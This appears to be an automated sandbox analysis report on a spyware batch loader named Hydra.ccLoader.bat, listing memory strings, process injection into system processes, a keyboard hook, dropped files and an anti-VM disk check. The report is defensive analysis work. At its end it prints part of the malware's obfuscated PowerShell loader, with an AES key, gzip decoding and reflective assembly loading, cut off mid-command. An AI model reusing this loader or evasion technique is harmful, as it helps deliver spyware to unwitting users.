Source: lsass.exe, 00000009.00000000.1498378085.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498792506.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498548674.0000017D2D442000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: dwm.exe, 0000000E.00000000.1544586967.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000000E.00000002.2878845130.00000262ED790000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://osoft.co_2010-06X
Source: lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000023.00000002.2814246539.0000026C03731000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000009.00000000.1498297311.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2760720097.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
Source: powershell.exe, 00000023.00000002.2814246539.0000026C03731000.00000004.00000001.00020000.00000000.sdmp, Null.6.drString found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000023.00000002.2814246539.0000026C03731000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000023.00000002.2814246539.0000026C03731000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6xG
Source: svchost.exe, 0000002D.00000000.1737742822.000002AE13FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736219604.000002AE13E0F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2835344258.000002AE13E0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
Source: svchost.exe, 0000002D.00000002.2834764061.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736450291.000002AE13E39000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736040592.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1739512168.000002AE14142000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2843841020.000002AE14142000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comSRD1%
Source: svchost.exe, 0000002D.00000000.1737742822.000002AE13FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736219604.000002AE13E0F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2835344258.000002AE13E0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comcom
Source: svchost.exe, 0000002D.00000000.1738511200.000002AE14044000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comSRD1-
Source: svchost.exe, 0000002D.00000002.2834764061.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2835872307.000002AE13E39000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736450291.000002AE13E39000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736040592.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comSRD13
Source: svchost.exe, 0000002D.00000002.2834764061.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736040592.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comSRD1#
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownHTTPS traffic detected: 108.181.61.49:443 -> 192.168.2.7:49828 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 4412, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Hydra.ccLoader.batStatic file information: 7306960
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$nya-onimai2\MzWhoQ.exeJump to dropped file
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,7_2_0000000140001868
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D1E2C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,8_2_000001CA7D1E2C80
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD52300 NtQuerySystemInformation,StrCmpNIW,9_2_0000017D2DD52300
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD527E8 NtQueryDirectoryFileEx,GetFileType,StrCpyW,9_2_0000017D2DD527E8
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1C92C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,14_2_00000262F1C92C80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2Jump to behavior
Source: C:\Windows\System32\cmd.exeFile created: C:\Windows\$rbx-onimai2\$rbx-CO2.batJump to behavior
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$nya-iM0vfZcHJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$nya-onimai2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$nya-onimai2\MzWhoQ.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\$rbx-onimai2
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_0000000140001CF07_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_0000000140002D4C7_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_00000001400031D07_2_00000001400031D0
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_00000001400012747_2_0000000140001274
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_00000001400024347_2_0000000140002434
Source: C:\Windows\System32\winlogon.exeCode function: 8_3_000001CA7D1BCE188_3_000001CA7D1BCE18
Source: C:\Windows\System32\winlogon.exeCode function: 8_3_000001CA7D1BCC948_3_000001CA7D1BCC94
Source: C:\Windows\System32\winlogon.exeCode function: 8_3_000001CA7D1B23F08_3_000001CA7D1B23F0
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D1EDA188_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D1ED8948_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D1E2FF08_2_000001CA7D1E2FF0
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D21DA188_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D21D8948_2_000001CA7D21D894
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D212FF08_2_000001CA7D212FF0
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D29DA188_2_000001CA7D29DA18
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D29D8948_2_000001CA7D29D894
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D292FF08_2_000001CA7D292FF0
Source: C:\Windows\System32\lsass.exeCode function: 9_3_0000017D2DD2CE189_3_0000017D2DD2CE18
Source: C:\Windows\System32\lsass.exeCode function: 9_3_0000017D2DD2CC949_3_0000017D2DD2CC94
Source: C:\Windows\System32\lsass.exeCode function: 9_3_0000017D2DD223F09_3_0000017D2DD223F0
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD5DA189_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD5D8949_2_0000017D2DD5D894
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD52FF09_2_0000017D2DD52FF0
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD8DA189_2_0000017D2DD8DA18
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD8D8949_2_0000017D2DD8D894
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD82FF09_2_0000017D2DD82FF0
Source: C:\Windows\System32\svchost.exeCode function: 12_3_0000022F4B8F23F012_3_0000022F4B8F23F0
Source: C:\Windows\System32\svchost.exeCode function: 12_3_0000022F4B8FCE1812_3_0000022F4B8FCE18
Source: C:\Windows\System32\svchost.exeCode function: 12_3_0000022F4B8FCC9412_3_0000022F4B8FCC94
Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000022F4B922FF012_2_0000022F4B922FF0
Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000022F4B92DA1812_2_0000022F4B92DA18
Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000022F4B92D89412_2_0000022F4B92D894
Source: C:\Windows\System32\dwm.exeCode function: 14_3_00000262F20ACC9414_3_00000262F20ACC94
Source: C:\Windows\System32\dwm.exeCode function: 14_3_00000262F20ACE1814_3_00000262F20ACE18
Source: C:\Windows\System32\dwm.exeCode function: 14_3_00000262F20A23F014_3_00000262F20A23F0
Source: C:\Windows\System32\dwm.exeCode function: 14_3_00000262F1CD23F014_3_00000262F1CD23F0
Source: C:\Windows\System32\dwm.exeCode function: 14_3_00000262F1CDCE1814_3_00000262F1CDCE18
Source: C:\Windows\System32\dwm.exeCode function: 14_3_00000262F1CDCC9414_3_00000262F1CDCC94
Source: C:\Windows\System32\dwm.exeCode function: 14_3_00000262F1DC23F014_3_00000262F1DC23F0
Source: C:\Windows\System32\dwm.exeCode function: 14_3_00000262F1DCCE1814_3_00000262F1DCCE18
Source: C:\Windows\System32\dwm.exeCode function: 14_3_00000262F1DCCC9414_3_00000262F1DCCC94
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1C92FF014_2_00000262F1C92FF0
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1C9DA1814_2_00000262F1C9DA18
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1C9D89414_2_00000262F1C9D894
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1D02FF014_2_00000262F1D02FF0
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1D0DA1814_2_00000262F1D0DA18
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1D0D89414_2_00000262F1D0D894
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1DF2FF014_2_00000262F1DF2FF0
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1DFDA1814_2_00000262F1DFDA18
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1DFD89414_2_00000262F1DFD894
Source: C:\Windows\System32\cmd.exeCode function: 15_3_000001C115C4CE1815_3_000001C115C4CE18
Source: C:\Windows\System32\cmd.exeCode function: 15_3_000001C115C4CC9415_3_000001C115C4CC94
Source: C:\Windows\System32\cmd.exeCode function: 15_3_000001C115C423F015_3_000001C115C423F0
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000001C115C7DA1815_2_000001C115C7DA18
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000001C115C7D89415_2_000001C115C7D894
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000001C115C72FF015_2_000001C115C72FF0
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000001C115CADA1815_2_000001C115CADA18
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000001C115CAD89415_2_000001C115CAD894
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000001C115CA2FF015_2_000001C115CA2FF0
Source: C:\Windows\System32\conhost.exeCode function: 16_3_000001BB497C23F016_3_000001BB497C23F0
Source: C:\Windows\System32\conhost.exeCode function: 16_3_000001BB497CCE1816_3_000001BB497CCE18
Source: C:\Windows\System32\conhost.exeCode function: 16_3_000001BB497CCC9416_3_000001BB497CCC94
Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001BB497F2FF016_2_000001BB497F2FF0
Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001BB497FDA1816_2_000001BB497FDA18
Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001BB497FD89416_2_000001BB497FD894
Source: C:\Windows\System32\svchost.exeCode function: 19_3_0000023942AECE1819_3_0000023942AECE18
Source: C:\Windows\System32\svchost.exeCode function: 19_3_0000023942AE23F019_3_0000023942AE23F0
Source: C:\Windows\System32\svchost.exeCode function: 19_3_0000023942AECC9419_3_0000023942AECC94
Source: C:\Windows\System32\svchost.exeCode function: 19_2_0000023942B1DA1819_2_0000023942B1DA18
Source: C:\Windows\System32\svchost.exeCode function: 19_2_0000023942B12FF019_2_0000023942B12FF0
Source: C:\Windows\System32\svchost.exeCode function: 19_2_0000023942B1D89419_2_0000023942B1D894
Source: C:\Windows\System32\svchost.exeCode function: 20_3_000002234E1023F020_3_000002234E1023F0
Source: C:\Windows\System32\svchost.exeCode function: 20_3_000002234E10CC9420_3_000002234E10CC94
Source: C:\Windows\System32\svchost.exeCode function: 20_3_000002234E10CE1820_3_000002234E10CE18
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002234E132FF020_2_000002234E132FF0
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002234E13D89420_2_000002234E13D894
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002234E13DA1820_2_000002234E13DA18
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002234E162FF020_2_000002234E162FF0
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002234E16D89420_2_000002234E16D894
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002234E16DA1820_2_000002234E16DA18
Source: C:\Windows\System32\svchost.exeCode function: 21_3_000001EF056ACC9421_3_000001EF056ACC94
Source: C:\Windows\System32\svchost.exeCode function: 21_3_000001EF056A23F021_3_000001EF056A23F0
Source: C:\Windows\System32\svchost.exeCode function: 21_3_000001EF056ACE1821_3_000001EF056ACE18
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001EF056DD89421_2_000001EF056DD894
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001EF056D2FF021_2_000001EF056D2FF0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001EF056DDA1821_2_000001EF056DDA18
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001EF0570D89421_2_000001EF0570D894
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001EF05702FF021_2_000001EF05702FF0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001EF0570DA1821_2_000001EF0570DA18
Source: C:\Windows\System32\svchost.exeCode function: 22_3_000002287AD423F022_3_000002287AD423F0
Source: C:\Windows\System32\svchost.exeCode function: 22_3_000002287AD4CC9422_3_000002287AD4CC94
Source: C:\Windows\System32\svchost.exeCode function: 22_3_000002287AD4CE1822_3_000002287AD4CE18
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000002287AD72FF022_2_000002287AD72FF0
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000002287AD7D89422_2_000002287AD7D894
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000002287AD7DA1822_2_000002287AD7DA18
Source: C:\Windows\System32\svchost.exeCode function: 23_3_000001B94DA6CC9423_3_000001B94DA6CC94
Source: C:\Windows\System32\svchost.exeCode function: 23_3_000001B94DA623F023_3_000001B94DA623F0
Source: C:\Windows\System32\svchost.exeCode function: 23_3_000001B94DA6CE1823_3_000001B94DA6CE18
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001B94DA9D89423_2_000001B94DA9D894
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001B94DA92FF023_2_000001B94DA92FF0
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001B94DA9DA1823_2_000001B94DA9DA18
Source: C:\Windows\System32\svchost.exeCode function: 24_3_000002520254CE1824_3_000002520254CE18
Source: C:\Windows\System32\svchost.exeCode function: 24_3_00000252025423F024_3_00000252025423F0
Source: C:\Windows\System32\svchost.exeCode function: 24_3_000002520254CC9424_3_000002520254CC94
Source: C:\Windows\System32\svchost.exeCode function: 24_2_000002520257DA1824_2_000002520257DA18
Source: C:\Windows\System32\svchost.exeCode function: 24_2_0000025202572FF024_2_0000025202572FF0
Source: C:\Windows\System32\svchost.exeCode function: 24_2_000002520257D89424_2_000002520257D894
Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000252025ADA1824_2_00000252025ADA18
Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000252025A2FF024_2_00000252025A2FF0
Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000252025AD89424_2_00000252025AD894
Source: C:\Windows\System32\svchost.exeCode function: 25_3_000001A9EBF923F025_3_000001A9EBF923F0
Source: C:\Windows\System32\svchost.exeCode function: 25_3_000001A9EBF9CE1825_3_000001A9EBF9CE18
Source: C:\Windows\System32\svchost.exeCode function: 25_3_000001A9EBF9CC9425_3_000001A9EBF9CC94
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE603A25_2_000001A9EBFE603A
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE600825_2_000001A9EBFE6008
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFC2FF025_2_000001A9EBFC2FF0
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE5FE925_2_000001A9EBFE5FE9
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE57B025_2_000001A9EBFE57B0
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE5F8F25_2_000001A9EBFE5F8F
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE5F7F25_2_000001A9EBFE5F7F
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE5F5025_2_000001A9EBFE5F50
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE5F4025_2_000001A9EBFE5F40
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE5F3025_2_000001A9EBFE5F30
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE5F0025_2_000001A9EBFE5F00
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE5EF025_2_000001A9EBFE5EF0
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE5EE025_2_000001A9EBFE5EE0
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE5EB025_2_000001A9EBFE5EB0
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE5EA025_2_000001A9EBFE5EA0
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE5E9025_2_000001A9EBFE5E90
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE5DA025_2_000001A9EBFE5DA0
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE5D6025_2_000001A9EBFE5D60
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE5D2025_2_000001A9EBFE5D20
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE5D1025_2_000001A9EBFE5D10
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE5C7F25_2_000001A9EBFE5C7F
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE5C6025_2_000001A9EBFE5C60
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE5C1025_2_000001A9EBFE5C10
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFCDA1825_2_000001A9EBFCDA18
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE59E025_2_000001A9EBFE59E0
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE599025_2_000001A9EBFE5990
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE594025_2_000001A9EBFE5940
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE613825_2_000001A9EBFE6138
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE590025_2_000001A9EBFE5900
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE60FA25_2_000001A9EBFE60FA
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE60D925_2_000001A9EBFE60D9
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFCD89425_2_000001A9EBFCD894
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFE608925_2_000001A9EBFE6089
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EC68D89425_2_000001A9EC68D894
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EC68DA1825_2_000001A9EC68DA18
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EC682FF025_2_000001A9EC682FF0
Source: Joe Sandbox ViewDropped File: C:\Windows\$nya-onimai2\MzWhoQ.exe 878DF6F755578E2E79D0E6FD350F5B4430E0E42BB4BC8757AFB97999BC405BA4
Source: MzWhoQ.exe.35.drStatic PE information: No import functions for PE file found
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2182
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2173
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2182Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2173Jump to behavior
Source: Process Memory Space: powershell.exe PID: 4412, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.spyw.evad.winBAT@30/16@1/2
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_0000000140002D4C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,7_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_000000014000217C SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,7_2_000000014000217C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Local\791ad183-7abe-425d-9d45-9b1abbbf8f56
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5928:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2040:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h1kok5rx.inc.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Hydra.ccLoader.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Hydra.ccLoader.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jKyNf, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$iUuMH);'.Replace('*', ''); Invoke-Expression 